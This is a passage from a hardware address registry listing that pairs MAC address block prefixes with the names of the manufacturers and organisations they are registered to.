Corporation 0050C2E36 Saia-Burgess Controls AG 0050C2E34 HGL Dynamics 0050C2E32 Oshoksh Corporation 0050C2E23 VITEC 0050C2E09 ATEME 0050C2E06 Ebner Electronic GmbH 0050C2E0E PMAC JAPAN 0050C2E0D Unixmedia Srl 0050C2E14 Calixto Systems Pvt Ltd 0050C2E13 Automation Assist Japan Company 0050C2E03 ICU Scandinavia Schweiz GmbH 0050C2E19 Zoe Medical 0050C2DF0 Koncar Electrical Engineering Institute 0050C2DEF Powersense A/S 0050C2DEB Ruwisch & Kollegen GmbH 0050C2DF6 HINO ENGINEERING, INC 0050C2DEC VendNovation LLC 0050C2DED Lee Laser 0050C2DFC I-Evo Ltd 0050C2DCF MCS Engenharia ltda 0050C2DC9 KinotonGmbH 0050C2DC8 T2M2 GmbH 0050C2DCC Instrumentel Limited 0050C2DC5 Saia-Burgess Controls AG 0050C2DB2 SoftwareCannery 0050C2DC2 TESSERA TECHNOLOGY INC. 0050C2DBF One-Nemoto Engineering Corporation 0050C2DAE Spang Power Electronics 0050C2DA9 Tieline Research Pty Ltd 0050C2DB6 PROSOFT-SYSTEMS LTD 0050C2DB7 SOREL GmbH Mikroelektronik 0050C2DB4 ZAO NPC "Kompjuternie Technologii" 0050C2DDB LUCEO 0050C2DD4 SYSTECH 0050C2D72 Scale-Tron, Inc. 0050C2D70 C. Rob. Hammerstein GmbH & Co. KG 0050C2D6F Imtron Messtechnik GmbH 0050C2D80 Keith & Koep GmbH 0050C2D77 Fr.SauterAG 0050C2D78 P4Q Electronics 0050C2D89 Visual Telecommunication Network, Inc 0050C2DA8 Sine Systems, Inc. 0050C2DA2 metraTec GmbH 0050C2D93 Axlon AB 0050C2D8C iRphotonics 0050C2D51 BETTINI SRL 0050C2D4B Indra Australia 0050C2D48 Watermark Estate Management Services, LLC 0050C2D5D GLOBALCOM ENGINEERING SRL 0050C2D5A Embedded Monitoring Systems Ltd. 0050C2D57 Hijikata Denki Corp. 0050C2D3E Synatec Electronic GmbH 0050C2D54 ABtrack s.r.l. 0050C2D64 TV1 GmbH 0050C2D38 Kyowa Electronics Co.,Ltd. 0050C2CF3 Daiken Automacao Ltda 0050C2CF4 Baudisch Electronic GmbH 0050C2CF1 TelGaAs, Inc. 0050C2D16 Imricor Medical Systems, Inc. 0050C2D15 MSR-Office GmbH 0050C2D24 Expro North Sea 0050C2D23 Bluestone Technology GmbH 0050C2D1D Moco Media Pty Ltd 0050C2D08 Reimesch Kommunikationssysteme GmbH 0050C2D2A Millennium Electronics Pty.Ltd. 0050C2D29 Axible Technologies 0050C2CFB New Embedded Technology 0050C2CEE EMBED-IT OG 0050C2CE8 Thomas & Betts 0050C2CED AeroMechanical Services Ltd, FLYHT 0050C2CE0 Industrial Control Links, Inc. 0050C2CDD K.C.C. SHOKAI LIMITED 0050C2CAA DSP DESIGN LTD 0050C2CBC CP ELETRONICA SA 0050C2CCC Smartech-technology 0050C2CC6 KDT 0050C2CE4 TEKTRONIK 0050C2CA4 Vox Technologies 0050C2C81 Odyssee Systemes SAS 0050C2C7F Kinects Solutions Inc 0050C2C7D TAE Antriebstechnik GmbH 0050C2C9F xxter b.v. 0050C2C9C Saia-Burgess Controls AG 0050C2C99 HJPC Corporation dba Pactron 0050C2C87 LECO Corporation 0050C2C88 CSI Controles e Sistemas Industriais Ltda. 0050C2CA2 The Logical Company 0050C2CA1 Wayne Kerr Electronics 0050C2C70 Wilke Technology GmbH 0050C2C68 Broadsoft PacketSmart, Inc. 0050C2C77 AIM Co.,Ltd 0050C2C74 Wapice Ltd. 0050C2C93 SENSAIR Pty Ltd 0050C2C8E SDD ITG 0050C2C46 QNE GmbH & Co. KG 0050C2C47 Weltek Technologies Co. Ltd. 0050C2C44 Beijing Zhongherongzhi Elec.&Tech.Co.,Ltd. 0050C2C25 Private 0050C2C24 Qualnetics Corporation 0050C2C21 Private 0050C2C1E Peperoni-Light 0050C2C3C ELSIST S.r.l. 0050C2C38 Computer Automation Technology Inc 0050C2C34 Kyuhen 0050C2C2F REFLEX CES 0050C2C2B Z-App Systems, Inc. 0050C2C55 Watterott electronic 0050C2C5E CellPlus technologies, Inc. 0050C2C0F DYCEC, S.A. 0050C2C07 CIO Informatique Industrielle 0050C2BDF Euro-Konsult Sp. z o.o. 0050C2BDA Digital Lumens 0050C2BD9 AMS Controls, Inc. 0050C2BED Touch Revolution Inc. 0050C2BE8 VEHICLE TESTING EQUIPMENT, S.L. 0050C2C02 Hanning Elektro-Werke GmbH & Co. KG 0050C2C01 QUERCUS TECHNOLOGIES, S.L. 0050C2BFD Ernemann Cine Tec GmbH 0050C2BF9 Vitel Net 0050C2C15 INO - Institut National d'Optique 0050C2C10 Keith & Koep GmbH 0050C2BCB ARTEIXO TELECOM 0050C2BB6 Quarch Technology Ltd 0050C2BB5 MROAD INFORMATION SYSTEM 0050C2BB1 Pro4tech 0050C2BB4 JSC Electrical Equipment Factory 0050C2BAE Fiber Connections Inc. 0050C2BAA NetworkFX Communications, LLC 0050C2BA9 SISS Technology Inc. 0050C2B95 Rx Monitoring Services 0050C2BA3 DSP DESIGN LTD 0050C2B9E Saia-Burgess Controls AG 0050C2BC4 Wheatstone Corporation 0050C2BC3 Phytec Messtechnik GmbH 0050C2B8B FBB 0050C2B86 ASTO 0050C2B82 TANABIKI Inc. 0050C2B93 EMC PARTNER AG 0050C2B6A Phytec Messtechnik GmbH 0050C2B69 Thetis S.p.A. 0050C2B62 Measurement Technology NW 0050C2B5D Plitron Manufacturing Inc. 0050C2B5F North Bridge Technologies 0050C2B71 Digitale Analoge COMponenten West Electronic Vertriebs GmbH 0050C2B72 Advanced Desktop Systems Ltd 0050C2B4D Troll Systems Corporation 0050C2B44 Ampcontrol Pty Ltd 0050C2B46 Mobileye 0050C2B79 MITSUYA LABORATORIES INC. 0050C2B83 Advanced Storage Concepts, Inc. 0050C2B5C ADI Video Technologies 0050C2B53 Prodco 0050C2B4B Chitose Co.,Ltd 0050C2B0E KYAB Lulea AB 0050C2B09 Harper Chalice Group Limited 0050C2B3A Nikon Systems Inc. 0050C2B3B Sportvision Inc. 0050C2B33 Numcore Ltd 0050C2B35 haneron 0050C2B2D Datasat Digital Entertainment 0050C2B2B CosmoData Informatica Ltda. 0050C2B29 Integra LifeSciences (Ireland) Ltd 0050C2B17 Elcoteq Design Center Oy 0050C2B16 Neothings, Inc. 0050C2B14 Keith & Koep GmbH 0050C2B11 EXEL s.r.l 0050C2B03 Spider Tecnologia Ind. e Com. Ltda. 0050C2B01 HSR Harald L. Reuter 0050C2ADC Synthesechemie Dr. Penth GmbH 0050C2AD9 elettrondata srl 0050C2AD7 Air Monitors Ltd 0050C2AFE Trolex Limited 0050C2AFC Odus Technologies SA 0050C2AF7 Midwest Microwave Solutions Inc. 0050C2AF6 Energid 0050C2AF5 Kramara s.r.o. 0050C2AEE IPtec, Inc. 0050C2AEC Fritz Pauker Ingenieure GmbH 0050C2AE4 Advanced Electronic Designs, Inc. 0050C2AD2 Rafael 0050C2AAB BRS Sistemas Eletrônicos 0050C2AA9 SAN GIORGIO S.E.I.N. srl 0050C2AB6 Gygax Embedded Engineering GEE.ch 0050C2AB1 Bitmanufaktur GmbH 0050C2AB3 Compañía de Instrumentacion y control, S.L. 0050C2ABC Barrick 0050C2ABD Monitor Business Machines Ltd. 0050C2ABA Saia-Burgess Controls AG 0050C2AAE OUTLINE srl 0050C2AB0 FRAKO Kondensatoren- und Anlagenbau GmbH 0050C2A97 MICROSYSTEMES 0050C2AA4 PSi Printer Systems international GmbH 0050C2A9B PDQ Manufacturing Inc. 0050C2AC1 DAISHIN-DENSHI Co., Ltd 0050C2A7F Phytec Messtechnik GmbH 0050C2A77 Keith & Koep GmbH 0050C2A74 DSP DESIGN LTD 0050C2A40 Mosberger Consulting LLC 0050C2A71 Purite Ltd 0050C2A69 Advanced Integrated Systems 0050C2A63 EMS Industries 0050C2A5C JSC "Component-ASU" 0050C2A83 Techno Sobi Co. Ltd. 0050C2A81 BPC circuits Ltd 0050C29EB AFORE Solutions Inc. 0050C29E8 Hammock Corporation 0050C29E4 Pyxis Controls WLL 0050C29F7 Dave Jones Design 0050C29F2 Keith & Koep GmbH 0050C29F3 Vision Technologies, Inc. 0050C2A13 Talyst, Inc. 0050C2A35 Appareo Systems, LLC 0050C2A36 Shenzhen Shangji electronic Co.Ltd 0050C2A34 Casabyte Inc. 0050C29FF Humphrey Products 0050C2A0D CHARLYROBOT 0050C2A0B IDS GeoRadar s.r.l. 0050C2A23 Agility Mfg, Inc. 0050C2A0A ACD Elektronik GmbH 0050C2A03 EEG Enterprises Inc 0050C29DC FTM Marketing Limited 0050C29D4 FIRST 0050C29A2 SAMsystems GmbH 0050C299D Powersense A/S 0050C29C0 Stuyts Engineering Haarlem BV 0050C29BA Connor-Winfield 0050C29DA NEUTRONIK e.K. 0050C29B0 Ebru GmbH 0050C29AE Esensors, Inc. 0050C29AB Electrodata Inc. 0050C29D2 Saia-Burgess Controls AG 0050C296C Aqua Cooler Pty Ltd 0050C2968 BuLogics, Inc. 0050C2965 Emitech Corporation 0050C2976 SANDS INSTRUMENTATION INDIA PVT LTD 0050C2971 IPITEK 0050C2960 kuroneko dennnou kenkyuushitsu 0050C2990 Keith & Koep GmbH 0050C298B TI2000 TECNOLOGIA INFORMATICA 2000 0050C298C MGM-Devices Oy 0050C297D Soehnle Professional GmbH & Co.KG 0050C297A KST Technology Co., Ltd 0050C296F Varec Inc. 0050C295B AS Solar GmbH 0050C2961 Picsolve International Limited 0050C2957 STRATEC Control Systems 0050C294F IT-Designers GmbH 0050C294D C&H technology ltd. 0050C2935 Image Video 0050C2943 QuanZhou TDX Electronics Co., Ltd. 0050C290C LSS GmbH 0050C290A Board Level Limited 0050C290B E.ON ES Sverige AB 0050C2919 AHV Systems, Inc. 0050C2917 CIRTEM 0050C292B DSP DESIGN 0050C2920 Rogue Engineering Inc. 0050C28EA ATEME 0050C28E8 Friedrich Kuhnt GmbH 0050C28D1 Bachmann Monitoring GmbH 0050C28CF GigaLinx Ltd. 0050C28DF Dipl.-Ing. W. Nophut GmbH 0050C28D6 UltraVision Security Systems, Inc. 0050C28BA Fr. Sauter AG 0050C28BE The Pennsylvania State University 0050C2871 R-S-I Elektrotechnik GmbH & Co. KG 0050C2873 XRONET Corporation 0050C285C B S E 0050C285B Boreste 0050C2859 Nuvation 0050C286A USM Systems, Ltd 0050C286C Condigi Televagt A/S 0050C2869 Funkwerk plettac electronic GmbH 0050C28A4 BALOGH T.A.G Corporation 0050C28A5 Mocon, Inc. 0050C28A3 RTW GmbH & Co.KG 0050C2863 Advanced Technology Solutions 0050C285F GD Mission Systems 0050C2899 Inico Technologies Ltd. 0050C2893 EIZO Technologies GmbH 0050C287C Arcontia AB 0050C288B Hollis Electronics Company LLC 0050C2882 WARECUBE,INC. 0050C282B Keith & Koep GmbH 0050C2847 Lars Morich Kommunikationstechnik GmbH 0050C283A Syr-Tec Engineering & Marketing 0050C2832 S1nn GmbH & Co. KG 0050C2834 ANTEK GmbH 0050C282E LogiCom GmbH 0050C282F Momentum Data Systems 0050C2854 Ratioplast-Optoelectronics GmbH 0050C2846 ESP-Planning Co. 0050C284F Gamber-Johnson LLC 0050C284E DRACO SYSTEMS 0050C2829 Intellectronika 0050C2827 Enero Solutions inc. 0050C2825 Funkwerk Information Technologies Karlsfeld GmbH 0050C2818 Wireless Value BV 0050C2814 Telvent 0050C2815 microC Design SRL 0050C27EC Lyngsoe Systems 0050C27E8 Mistral Solutions Pvt. Ltd 0050C27E7 V2Green, Inc. 0050C2810 Alphion Corporation 0050C280E Bruno International Ltd. 0050C280C Luxpert Technologies Co., Ltd. 0050C281D IT SALUX CO., LTD. 0050C2800 Delphi Display Systems, Inc. 0050C27DF Private 0050C27DE Cascade Technologies Ltd 0050C27F3 SOREC 0050C27F2 Logotherm Regelsysteme GmbH 0050C2809 Varma Electronics Oy 0050C27D9 Volumatic Limited 0050C27DA HTEC Limited 0050C27DB Mueller Elektronik 0050C25A2 iNET Systems Inc. 0050C2784 Lewis Controls Inc. 0050C27B1 ATEME 0050C27AC IUSA SA DE CV 0050C27CF Emitech Corporation 0050C27D0 Radar Tronic ltd. 0050C27CC SWECO JAPS AB 0050C27C8 Fr. Sauter AG 0050C27C4 MoBaCon 0050C27C3 AST INCORPORATED 0050C27B6 Alstom (Schweiz) AG 0050C27BF Zoe Medical 0050C27A6 ASIANA IDT 0050C27A1 Field Design Service 0050C279B Schniewindt GmbH & Co. KG 0050C279C Vital Systems Inc 0050C277D Lincoln Industrial 0050C2779 Coral Telecom Ltd 0050C2778 SunGard Vivista 0050C2783 NORMA systems GmbH 0050C276B Putercom Enterprise Co., LTD. 0050C276C EFG CZ spol. s r.o. 0050C2774 GeoSIG Ltd. 0050C2794 COMSONICS, INC. 0050C274D Beceem Communications, Inc. 0050C274B STAR-Dundee Ltd 0050C2749 Affolter Technologies SA 0050C2742 Fantuzzi Reggiane 0050C2753 ABB 0050C2750 Brightlights Intellectual Property Ltd 0050C2745 ACISA 0050C2754 Abeo Corporation 0050C2737 Teradici Corporation 0050C272A Phytec Messtechnik GmbH 0050C2729 SP Controls, Inc 0050C271F ASC telecom AG 0050C270E AUDICO SYSTEMS OY 0050C271B ADVA Optical Networking 0050C271A Logus Broadband Wireless Solutions Inc. 0050C2715 RIEXINGER Elektronik 0050C2709 RO.VE.R. Laboratories S.p.A 0050C26FD SAIA Burgess Controls AG 0050C2733 Cimetrics Research Pty Ltd 0050C26EE Interactive Electronic Systems 0050C26EC Netistix Technologies Corporation 0050C26CF Microway 0050C26D2 Lumistar Incorporated 0050C26D5 Becker Electronics GmbH 0050C26E6 Lanetco 0050C26CD RGM SPA 0050C269E Ideus AB 0050C26AE Qualisys AB 0050C26A7 Hoer GmbH & Co. Industrie-Electronic KG 0050C26AC Thales UK 0050C26A9 Armida Technologies Corporation 0050C2698 Navtech Radar Ltd 0050C2697 Monarch Instrument 0050C2694 Initel srl 0050C2692 Mate Media Access Technologies 0050C26BE ESTEC Co.,Ltd. 0050C26B7 System LSI CO.Ltd. 0050C26B8 Epec Oy 0050C26CE EMITALL Surveillance S.A, 0050C26B3 4RF Communications Ltd 0050C2674 Protech Optronics Co., Ltd. 0050C2672 DDS Elettronica srl 0050C2669 DSP DESIGN 0050C2682 Commet AB 0050C265D Redfone Communications LLC 0050C2684 REASON Tecnologia S.A. 0050C2691 Interopix, Inc. 0050C265E Cantion A/S 0050C2637 Omnitrol Networks, Inc. 0050C2638 HUNGAROCOM Telecommunication Ltd. 0050C2636 dSPACE GmbH 0050C2632 RoseTechnology A/S 0050C2640 IAC 0050C263A 3DSP Corporation 0050C2648 Fidelity Comtech, Inc. 0050C2633 Rice University 0050C262F QES 0050C262D Procon Electronics 0050C2658 OpenPKG GmbH 0050C2649 Pan-STARRS 0050C260A Gradual Tecnologia Ltda. 0050C2607 Telecom FM 0050C2602 CHAUVIN ARNOUX 0050C2603 Cerus Corp 0050C2609 Toptech Systems, Inc. 0050C2618 Intergrated Security Mfg. Ltd 0050C2614 Proserv 0050C261B NCI Technologies Inc. 0050C25F2 ESEM Grünau GmbH & Co. KG 0050C25D4 Buyang Electronics Industrial Co., Ltd. 0050C25D0 Automata Spa 0050C25D9 Crimson Microsystems, Inc. 0050C25DC RM Michaelides Software & Elektronik GmbH 0050C25DB Secure Systems & Services 0050C25E8 Info-Chip Communications Ltd. 0050C25D7 Synrad, Inc. 0050C25D5 Cannon Technologies 0050C25DE Magal Senstar Inc. 0050C25C6 Technische Alternative GmbH 0050C25C7 InSync Technology Ltd 0050C25ED AQUAROTTER A FRANKE COMPANY 0050C25EF pikkerton GmbH 0050C25EE Condre Corporation 0050C2588 Federal Electronics 0050C2584 Toyota Motorsport GmbH 0050C25B3 HITECOM System 0050C259D DSS Networks, Inc. 0050C25A3 LUMEL S.A. 0050C25A1 Vestfold Butikkdata AS 0050C2598 Bundesamt für Strahlenschutz 0050C2554 Weinzierl Engineering GmbH 0050C2551 Innovative Neurotroncs 0050C254D Silent System 0050C2580 Buyang Electronics Industrial co.,Ltd. 0050C257B ptswitch 0050C2577 Advanced Software Technologies 0050C257A nVent, Schroff GmbH 0050C2572 Chell Instruments Ltd 0050C255C ads-tec GmbH 0050C256C Targeted Technologies, LLC 0050C254C Sintecnos srl 0050C254B Innopsys 0050C2522 Mark IV IDS Corp. 0050C2520 McCain Traffic Supply 0050C251D VELUX 0050C2546 Universidad de Chile Facultad de Medicina 0050C2542 AVerMedia Technologies, Inc. 0050C253C Marposs SPA 0050C253B Teleks Co. Ltd. 0050C2525 VASTech 0050C252F Gesellschaft für Rationalisierung und Rechentechnik mbH 0050C2515 Monaghan Engineering, Inc. 0050C2544 Zetera 0050C2518 Christ Elektronik GmbH 0050C2500 Orenco Systems, Inc. 0050C24E5 Sedo Systems Ltd 0050C24E2 Applied Research Laboratories: UT 0050C24ED Lab X Technologies, LLC 0050C24EA PMC 0050C2511 Tecna Srl 0050C2512 Linear Acoustic, Inc 0050C24F8 Prodco International Inc. 0050C24F9 RTDS Technologies Inc. 0050C2507 Micro Connect Pty Ltd 0050C24B4 Matrix Audio Designs 0050C24B6 General Resources Co., LTD. 0050C24B3 ANSA Corporation 0050C24B5 Valley Tecnologia 0050C24B2 TESLA, a.s. 0050C24CA Yarg Biometrics Limited 0050C24DA MEDIORNET GmbH 0050C24DB Alfing Montagetechnik GmbH 0050C24D2 Twoway CATV SERVICE INC. 0050C24C7 Transbit Sp.z o.o. 0050C24A7 iseg Spezialelektronik GmbH 0050C24A5 Teledyne Monitor Labs 0050C249E Armorlink Co .Ltd 0050C249B vg controls, inc 0050C2498 Quartet Technology, Inc. 0050C2484 Kooltech LLC 0050C2482 PRIAMUS SYSTEM TECHNOLOGIES AG 0050C2479 Unlimited Bandwidth LLC 0050C2474 Venue 1, Inc. 0050C2492 TRAFSYS AS 0050C2443 Pickering Laboratories 0050C246E Avenir Technologies Inc. 0050C2471 Pixtree Technologies, inc. 0050C2468 Network I/O 0050C2451 HAMEG GmbH 0050C2450 Enconair Ecological Chambers Inc. 0050C246A ISE GmbH 0050C245A Funkwerk plettac electronic GmbH 0050C2421 EFSYS 0050C2422 ads-tec GmbH 0050C2416 SELCO s.r.l. 0050C241A Bluewater Systems Ltd 0050C243B A3IP 0050C2405 Guralp Systems Limited 0050C2401 Promess Incorporated 0050C2437 PowerWAN, Inc 0050C2433 Idetech Europe S.A. 0050C241E Videotek Sistemas Eletronicos Ltda. 0050C241C Infrasafe, Inc. 0050C23E3 CSIRO - Division of Exploration and Mining 0050C23E1 NeuLion Incorporated 0050C23E0 Oy Stinghorn Ltd 0050C23B7 Mindspeed Technologies 0050C23B8 Keith & Koep GmbH 0050C23B2 Tennessee Valley Authority 0050C23D1 Braintronics BV 0050C23D6 Comlab Inc. 0050C23FD HARTMANN software GbR 0050C23F7 Advantage R&D 0050C23EC Teneros 0050C23E7 Revolution Education Ltd 0050C23BB IMAGO Technologies GmbH 0050C238E Nordic Alarm AB 0050C2397 MANGO DSP Ltd. 0050C2396 RapidWave Inc. 0050C2399 Advanced Micro Controls Inc. 0050C239E A.R.G ElectroDesign Ltd 0050C23AC InAccess Networks 0050C23A9 Westronic Systems Inc. 0050C238B InterBridge,Inc. 0050C23AA Networked Robotics Corporation 0050C23A2 Vegas Amusement 0050C23A7 Elektrotechnik & Elektronik Oltmann GmbH 0050C239D DigitalDeck, Inc. 0050C235A Advanced Si-Net Co., LTD. 0050C2356 Baytech Cinema 0050C235C Ratotec GmbH 0050C2361 Contec 0050C238A Embedtronics Enterprise 0050C234B Ecutel Systems, Inc. 0050C2352 LUCEO 0050C2350 Kinesys Projects Limited 0050C2353 Crossing Informationssysteme GmbH 0050C2377 Xycom VME 0050C2376 CLEODE 0050C2373 Companion Worlds, inc. 0050C236C RISCO Group 0050C2340 Virtu 0050C231B Datacon 0050C2313 SAIA Burgess Controls AG 0050C2314 MicroBee Systems, Inc 0050C2337 ETI 0050C232F PULTRONICS 0050C2332 PUNJAB COMMUNICATIONS LTD 0050C230A Innings Telecom Inc. 0050C2302 EuroDesign embedded technologies GmbH 0050C2303 CI Systems Ltd. 0050C22FD American Microsystems, Ltd. 0050C2336 Golden River Traffic 0050C231F Geotech Instruments, LLC 0050C22F6 Clifford Chance LLP 0050C22F3 Crossbow Technology, Inc. 0050C22C7 Siliquent Technologies Ltd 0050C22C8 SELCO 0050C22C5 Elman srl 0050C22C6 Initial Electronic Security Systems 0050C22D6 WIS Technologies 0050C22EC CHENGDU BOOK DIGITAL CO., LTD 0050C22D9 Private 0050C22E5 Transtech DSP 0050C22B4 Polatis Ltd 0050C22B5 Hobbes Computer Network Accessories 0050C22B0 Telda Electronics 0050C22AD ABB T&D Spa 0050C22AC BBI Engineering, Inc. 0050C22AF CSA Computer & Antriebstechnik GmbH 0050C22C3 Digital SP Ltd 0050C22BC Uster Technologies AG 0050C22A5 Septier Communication Ltd 0050C2024 IPITEK 0050C229A Packet Techniques Inc. 0050C229B ACD Elektronik GmbH 0050C229C 2N TELEKOMUNIKACE a.s. 0050C22A0 Sterling Industry Consult GmbH 0050C2267 Allen Martin Conservation Ltd 0050C227A Maestro Pty Ltd 0050C2279 PATLITE Corporation 0050C2272 Verex Technology 0050C2269 Technisyst Pty Ltd 0050C226F Digital Recorders Inc 0050C2297 KINETICS 0050C228E Tattile srl 0050C2258 Spacesaver Corporation 0050C2245 Hauppauge Computer Works, Inc. 0050C2242 MDS SCIEX 0050C2236 JLCooper Electronics 0050C224C Supertel 0050C2209 LK Ltd 0050C2206 Windmill Innovations 0050C221D ESG Elektroniksystem u. Logistik GmbH 0050C221F Monitor Business Machines Ltd 0050C2221 Getinge IT Solutions ApS 0050C222E LORD INGENIERIE 0050C2238 Schwer+Kopka GmbH 0050C2225 nVent, Schroff GmbH 0050C21E0 Cognex Corporation 0050C21DB Applied Systems Engineering, Inc. 0050C21FC EDD Srl 0050C21FD SouthWing S.L. 0050C21E3 Bluesocket, Inc. 0050C21EC COSMO co.,ltd. 0050C21D3 Synopsys 0050C21BE Sedia Electronics 0050C21BA INTERZEAG AG 0050C21AB Streaming Networks 0050C21CE Datatek Applications, Inc. 0050C21CA EVER Sp. z o.o. 0050C21CF LIFETIME MEMORY PRODUCTS, INC. 0050C21A3 Tidel Engineering, L.P. 0050C2190 Goerlitz AG 0050C21A2 ABB Switzerland Inc 0050C21A9 Axotec Technologies GmbH 0050C2170 Taishodo Seiko Co., Ltd. 0050C2044 Private 0050C2004 SCI Technology Inc. 0050C200B IO Limited 0050C2014 Canal + 0050C216B Masterclock, Inc. 0050C200E TTTech 0050C200C Vbrick Systems Inc. 0050C2016 DSP Design Ltd. 0050C200A Tharsys 0050C216C Brijing Embedor Embedded Internet Tech. Co. Ltd. 0050C2171 Quantronix, Inc. 0050C2182 wolf-inf-tec 0050C217D Cognex Corporation 0050C2177 Unicoi Systems 0050C2176 Wavium AB 0050C2161 J&B Engineering Group S.L. 0050C2160 TTI - Telecom International Ltd. 0050C2162 Teseda Corporation 0050C2164 Acunia N.V. 0050C2156 CommServ Solutions Inc. 0050C2151 Redux Communications Ltd. 0050C2159 Standard Comm. Corp. 0050C2131 InBus Engineering, Inc. 0050C2123 Seranoa Networks, Inc. 0050C2127 TPA Traffic & Parking Automation BV 0050C2119 Global Opto Communication Tech. Corp 0050C2122 Diva Systems 0050C20FF IPAXS Corporation 0050C20ED Valley Products Corporation 0050C20FB PIUSYS Co., Ltd. 0050C2100 Corelatus A.B. 0050C2101 LAUD Electronic Design AS 0050C2110 QuesCom 0050C20F2 KMS Systems, Inc. 0050C20F0 VHB Technologies, Inc. 0050C20DE Frederick Engineering 0050C20EE Industrial Indexing Systems, Inc. 0050C20E9 Smartmedia LLC 0050C20D6 Inco Startec GmbH 0050C20D4 Palm, Inc. 0050C20B7 RYMIC 0050C20C3 Tonbu, Inc. 0050C20BA Pro-Active 0050C20AF Latus Lightworks, Inc. 0050C20A5 Mobiltex Data Ltd. 0050C20A9 Radiant Networks Plc 0050C20A1 Visable Genetics, Inc. 0050C20A3 BaSyTec GmbH 0050C2087 Monitor Business Machines Ltd. 0050C2086 Validyne Engineering Corp. 0050C208E BSQUARE 0050C208D Kylink Communications Corp. 0050C208C IP Unity 0050C2093 KOREALINK 0050C2089 Fenwal Italia S.P.A. 0050C209B Seffle Instrument AB 0050C2084 DIALOG4 System Engineering GmbH 0050C2081 Matuschek Messtechnik GmbH 0050C207E JL-teknik 0050C2079 Flextel S.p.A 0050C2052 Mayo Foundation 0050C2050 Dataprobe, Inc. 0050C2058 Vision Research, Inc. 0050C204A Telecom Analysis Systems, LP 0050C2045 Chase Manhattan Bank 0050C2038 Etheira Technologies 0050C2037 E.I.S.M. 0050C202A VersaLogic Corp. 0050C201E CallTech International Limited 0050C2019 Emtac Technology Corp. 0050C2011 Bihl + Wiedemann GmbH 0050C2010 Moisture Systems 0050C2007 Clive Green & Co. Ltd. 0050C2006 Project Management Enterprises, Inc. B44D43E GearUP Portal Pte. Ltd. FCCD2F5 QCTEK CO.,LTD. 6C2ADF3 Johnson Controls IR, Sabroe Controls 7006922 Scud (Fujian) Electronics Co.,Ltd 700692B SWIT Electronics Co.,Ltd 7006926 Hangzhou Clounix Technology Limited 700692E Ganghsan Guanglian 6C2ADF6 ITI Limited 6C2ADFA JBF F40E11F Private 885D90F Private 54083BE Sinclair Technologies 54083BD BHS Corrugated Maschinen- und Anlagenbau GmbH 54083BC FairPhone B.V. 7006929 Shenzhen Lingwei Technology Co., Ltd 7006924 Fusiostor Technologies Private Limited E03C1C5 Semic Inc. 54083BB Korea Bus Broadcasting B01F81F Private B437D1F Private A44F29F Private F80278F Private E03C1CD Sprintshield d.o.o. E03C1CA MELAG Medizintechnik GmbH & Co. KG D016F00 Shenzhen Lesingle Technology CO., LTD. D016F0C Peralex Electronics (Pty) Ltd E03C1C8 Jiangsu Riying Electronics Co.,Ltd. E81863F Private B0C5CAF Private 3C39E7F Private D093956 Annapurna labs D09395B Invendis Technologies India Pvt Ltd 5C6AECB Shenzhen Anked vision Electronics Co.Ltd 5C6AEC2 Shenzhen Mingyue Technology lnnovation Co.,Ltd 5C6AEC1 Shanghai Smilembb Technology Co.,LTD 5C6AECD DarkVision Technologies Inc. C0EAC3B SeongHo Information and Communication Corp. C0EAC36 Worldpass industrial Company Limited C0EAC31 Dongguan Wecxw CO.,Ltd. 8C5DB28 Guangzhou Phimax Electronic Technology Co.,Ltd 8C5DB29 ISSENDORFF KG 7C45F9D Mobilaris Industrial Solutions 7C45F99 MIJ CO LTD 8C5DB26 SmartMore Corporation Limited C0EAC33 Hangzhou Qixun Technology Co., Ltd 8C5DB2D Guandong Yuhang Automation Technology Co.,Ltd 8C5DB21 DAYOUPLUS 705A6F8 LUAN Industry and Commerce Co., Ltd C4A559E SERNET (SUZHOU) TECHNOLOGIES CORPORATION 705A6F4 Vaiotik Co., Ltd 705A6F2 Tyromotion GmbH 705A6FD PICadvanced SA C4A5593 X-speed lnformation Technology Co.,Ltd 705A6F0 Thyracont Vacuum Instruments GmbH 84B3864 COBHAM 84B3869 Weiss Robotics GmbH & Co. KG C083597 Fuzhou Fdlinker Technology Co.,LTD C4A559B SMH Technologies SRL 0CCC478 NINGBO QIXIANG INFORMATION TECHNOLOGY CO., LTD F0221DE oToBrite Electronics, Inc. F0221DD Schleissheimer Soft- und Hardwareentwicklung GmbH F0221DC Estone Technology LTD 4C93A65 Fastenal IP Company E0382D4 Qingdao Unovo Technologies Co., Ltd E0382D5 Weishi Intelligent Information Technology (Guangzhou) Co., LTD E0382D2 Xi'an Xiangxun Technology Co., Ltd. E0382D8 Shenzhen iTest Technology Co.,Ltd 0CCC479 OptConnect 0CCC473 Shimane Masuda Electronics CO.,LTD. E0382D1 Annapurna labs F0221D0 THANHBINH COMPANY - E111 FACTORY D46137C MUSASHI ENGINEERING,INC. 4C74A7D ddcpersia D096865 Annapurna labs D09686B Changsha keruijie lnformation Technology Co.,Ltd C49894A Neron Informatics Pvt Ltd D096868 Energiekonzepte Deutschland GmbH D096864 Houston Radar LLC C483722 AI-RIDER CORPORATION C48372D Annapurna labs 6CDFFB3 Beijing Ainemo Co Ltd C48372B care.ai C483728 ACCELECOM LTD. 741AE09 Private D420001 Zelus(HuangZhou) Technology Ltd. D420000 Wattsense C4A10E0 HYOSUNG Heavy Industries Corporation D420007 Annapurna labs 5847CA0 LITUM BILGI TEKNOLOJILERI SAN. VE TIC. A.S. 5847CA8 Birger Engineering, Inc. 5847CA4 Future Tech Development FZC LLC 883CC5E myUpTech AB 2C691D4 SPEEDTECH CORP. 2C691D8 IBM 883CC5D Lenard Enterprises Inc 18C3F4B VECTOR TECHNOLOGIES, LLC 883CC59 SERNET (SUZHOU) TECHNOLOGIES CORPORATION 18C3F4C HANGZHOU ZHONGKEJIGUANG TECHNOLOGY CO., LTD 883CC5C HDL da Amazônia Industria Eletrônica Ltda 18C3F49 Ningbo Yuda Communication Technology Co.,Ltd FC6179C Shenzhen Xmitech Electronic Co.,Ltd 303D511 SHENZHEN WLINK TECHNOLOGY CO., LTD. 303D51B Labman Automation 303D510 Fink Telecom Services GmbH 303D516 Amber-Link Network Technology Co.,Ltd. FC61795 Qisda Corporation 8C51095 Heliox Automotive B.V. 8C51091 Amzetta Technologies, LLC 0C7FED0 Guangdong Tianshu New Energy Technology Co., Ltd 0C7FEDA Annapurna labs 7050E7E KFBIO (KONFOONG BIOINFORMATION TECH CO.,LTD) 8002F4B Baicells Technologies Co., Ltd 8002F40 BK Networks Co,. Ltd. 7050E78 Shenzhen Dangs Science and Technology CO.,Ltd. C4A10ED Connectlab SRL C4A10E1 BARTEC PIXAVI AS C4A10E8 